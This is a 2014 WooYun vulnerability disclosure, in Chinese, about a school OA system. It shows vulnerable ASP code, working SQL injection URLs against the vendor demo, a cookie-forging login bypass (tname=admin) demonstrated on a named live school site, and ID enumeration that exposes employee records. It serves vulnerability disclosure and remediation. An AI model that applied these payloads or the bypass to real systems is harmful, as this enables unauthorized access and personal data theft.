某OA系统越权、多处SQL注入及任意用户登陆包括管理员（无需登录）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-061600

漏洞标题：某OA系统越权、多处SQL注入及任意用户登陆包括管理员（无需登录）

漏洞作者： xfkxfk

提交时间：2014-05-20 15:17

修复时间：2014-08-18 15:18

公开时间：2014-08-18 15:18

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-20：细节已通知厂商并且等待厂商处理中
2014-05-25：厂商已经确认，细节仅向厂商公开
2014-05-28：细节向第三方安全合作伙伴开放
2014-07-19：细节向核心白帽子及相关领域专家公开
2014-07-29：细节向普通白帽子公开
2014-08-08：细节向实习白帽子公开
2014-08-18：细节向公众公开

简要描述：

大量案例中招，官网demo中招，多处漏洞

详细说明：

广州市颖峰信息科技有限公司
http://www.yfidea.com/product.asp
官方demo地址：
http://demo.yfidea.com/
官方成功案例：
http://www.yfidea.com/AnLi.asp
Google搜索案例：
Google关键字：技术支持：创想颖峰
搜索结果：43,400
从官网和搜索结果中看，用户还是很多的。
http://oa.bh5z.net/Index.asp
http://222.178.145.174:8000/Index.asp
http://oa.gz65.com/
http://hsoa.bgyhs.net/
http://www.xmqwzx.com/Index.asp
http://oa.lhljzx.com/
......
使用此OA的都是学校和教育部门，用户量很多，影响范围不小。

漏洞证明：

0x001 越权访问+SQL注入
第一处SQL注入
文件/OA/varset/modify.asp

<p>
  <%
strId=request("id")
 tname=request("tname")
Set rs=Server.CreateObject("Adodb.Recordset")
sql="select * from varset where     ID='"&strID& "'"
rs.open sql,conn,1,1
%>
</p>

注入地址：
http://demo.yfidea.com/OA/varset/modify.asp?tname=bumenfile&id=-202' UNION ALL SELECT 1,2,3,db_name(),5,6,7--
第二处SQL注入
文件/OA/varset/modifyqishu.asp

<p>
  <%
   strId=request("id")
   tname=request("tname")
   Set rs=Server.CreateObject("Adodb.Recordset")
   sql="select * from varset where     ID='"&strID& "'"
   rs.open sql,conn,1,1
   %>

注入地址：
http://demo.yfidea.com/OA/varset/modifyqishu.asp?tname=bumenfile&id=-202' UNION ALL SELECT 1,2,3,db_name(),5,6,7--
第三处SQL注入
文件/OA/varset/modifysubject.asp

<p>
  <%
strId=request("id")
 tname=request("tname")
Set rs=Server.CreateObject("Adodb.Recordset")
sql="select * from varset where     ID='"&strID& "'"
rs.open sql,conn,1,1
%>

注入地址：
http://demo.yfidea.com/OA/varset/modifysubject.asp?tname=bumenfile&id=-8892' UNION ALL SELECT 1,2,3,db_name(),5,6,7--
第四，五处SQL注入
文件/OA/varset/modifysys.asp

<p>
  <%
   var=request("var")
   vargroup=request("vargroup")
  
   set Rsvar= Conn.Execute("select * from varset where  name='"&var&"'")
	 
   %>
</p>
<p>　</p>
<p>　</p>
<form id="form3" name="form3" method="post" action="savemodifysys.asp?var=<%=var%>&vargroup=<%=vargroup%>"  onSubmit="return form_check();">
  <p>　</p>
  <table width="442" border="0" align="center" 
cellspacing="0" bordercolorlight="#11b1ff" bordercolordark="#f0f8ff">
    
    <tr align="middle">
      <td width="64" class="STYLE1">　</td>
      <td width="61" height="41" class="STYLE1"><div align="right">参数</div></td>
      <td width="315" align="center" valign="middle" class="STYLE1"><div align="left">
        <select name="vname" id="vname">
          <option><%=Rsvar( "vname" )%></option>
          <% Set RSsel = Conn.Execute("select * from varset where  name='"&vargroup& "'  order by vid" )
                   While NOT RSsel.EOF %>
          <option value="<%=RSsel( "vname" )%>"><%=RSsel( "vname" )%></option>
          <% RSsel.MoveNext
                  Wend
				  %>
        </select>
        <input name="Submit" type="submit" class="topanniu" value="保存修改" />
        </div>
      </label></td>
      <td width="8">　</td>
    </tr>
  </table>
  <p>　</p>
  <p>　</p>
  <p align="center">说明：<%=Rsvar( "shuoming" )%></p>
  <% RSsel.Close
     Rsvar.close%>
</form>

http://demo.yfidea.com/OA/varset/modifysys.asp?var=-123' UNION ALL SELECT 1,2,3,db_name(),5,6,7--&vargroup=456
http://demo.yfidea.com/OA/varset/modifysys.asp?var=1&vargroup=-456' UNION ALL SELECT 1,2,3,db_name(),5,6,7--
第六处SQL注入
文件/OA/varset/modifytime.asp

<p>
  <%
strId=request("id")
 varname=request("varname")
Set rs=Server.CreateObject("Adodb.Recordset")
sql="select * from varset where     ID='"&strID& "'"
rs.open sql,conn,1,1
%>
</p>

http://demo.yfidea.com/OA/varset/modifytime.asp?tname=bumenfile&id=-202' UNION ALL SELECT 1,2,3,db_name(),5,6,7--
第七处SQL注入
文件/OA/keyan/newfile.asp

<!--#include file="../SQLconn.asp"-->
<% 
dim strID
strId=request("id")
dim fjsql
dim fjrs
dim strfilename
fjsql="select * from wendangfile  where fid='"&strId& "'"
Set fjrs= Server.CreateObject("ADODB.Recordset")
fjrs.open fjsql,conn,1,1
Response.ContentType = fjrs("fileContentType")
'Response.AddHeader   "Content-Disposition","attachment;   filename="&fjrs("filename")
Response.AddHeader   "Content-Disposition","inline;   filename="&fjrs("filename")
Response.BinaryWrite fjrs("filevalue").getChunk(21212121) 
fjrs.close
set fjrs=nothing 
set conn=nothing 
%>

http://demo.yfidea.com/OA/keyan/newfile.asp?id=7' and 'a'='a——下载文件
http://demo.yfidea.com/OA/keyan/newfile.asp?id=7' and 'a'='b——无法下载文件
第八出SQL注入+越权访问+信息泄露
文件/OA/renshigongzi/modifyDangAn.asp

<%
   id=request("id")
   Set Rslist=Server.CreateObject("Adodb.Recordset")
   sqllist="select * from Employee where id='"&ID& "'"
   Rslist.open sqllist,conn,1,1
   
%>

http://demo.yfidea.com/OA/renshigongzi/modifyDangAn.asp?id=1
遍历id即可访问所有用户的档案信息，很详细的敏感信息
http://demo.yfidea.com/OA/renshigongzi/modifyDangAn.asp?id=1' and 'a'='a
显示正常
http://demo.yfidea.com/OA/renshigongzi/modifyDangAn.asp?id=1' and 'a'='b
显示错误，无回显
0x002 任意用户登录
文件/login.asp

<% 
   
   strip=Request.ServerVariables("REMOTE_ADDR")
   Set MyOAASPObj = Server.CreateObject("YFSchoolOApro.YFSchoolDll")
    str=MyOAASPObj.OA_Login(strip)
   set MyOAASPObj=nothing		   
			  
	dim str1
    str1=split(str,"|",-1,1)
	response.cookies("Tname")=str1(0)
	response.cookies("imgdir")=str1(1)
	response.cookies("nowxueqi")=str1(2)
	 
	response.cookies("filelength")=10	 '这个1是表示上传文件的长度不能超过1M，控制整个系统的文件大小
	if  str1(3)="888" then
	     response.redirect("OA/user/password.asp")
	else
	    response.redirect("OA/Index.asp")
	end if 
%>

这里的登录认证虽然通过了核心的dll文件，此dll文件加密无法看到源码，但是我们看大这些数据都是通过cookie进行处理的，肯定存在问题。。
再来看看/oa/checklogin.asp

<% '登陆控制，防止未登录查看
    if request.cookies("tname")="" then
        response.redirect("../Index.asp")
     end if
    %>

只是判断是否存在cookies("tname")来进行认证用户的访问权限。
所以经过测试，我们在Cookie中添加tname=用户名，即可登陆此用户账户。
以案例http://oa.bh5z.net为例
添加cookie：
tname=admin;
即可登陆admin用户

也可以添加cookie：
imgdir=004hong;
这是皮肤。
至于用户名，我们可以从这里得到：
http://oa.bh5z.net/oa/user/modifyuser.asp?iD=1824
遍历这里的id就可以获取全部用户，登录任意用户了。

修复方案：

最主要的控制权限，过滤

版权声明：转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：16

确认时间：2014-05-25 09:17

厂商回复：

CNVD确认并复现所述案例情况，先由CNVD通过公开联系渠道向软件生产厂商通报，对方确认测试网站修复。后续又下发给广东分中心继续跟踪处置，软件生产厂商反馈3.93版本已经修复。广东分中心经过仔细检测，确认仍然存在相关漏洞，目前仍然在进一步协调中。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-061600

漏洞标题：某OA系统越权、多处SQL注入及任意用户登陆包括管理员（无需登录）

相关厂商：cncert国家互联网应急中心

漏洞作者： xfkxfk

提交时间：2014-05-20 15:17

修复时间：2014-08-18 15:18

公开时间：2014-08-18 15:18

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-061600

漏洞标题：某OA系统越权、多处SQL注入及任意用户登陆包括管理员（无需登录）

相关厂商：cncert国家互联网应急中心

漏洞作者： xfkxfk

提交时间：2014-05-20 15:17

修复时间：2014-08-18 15:18

公开时间：2014-08-18 15:18

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-061600"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 xfkxfk@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：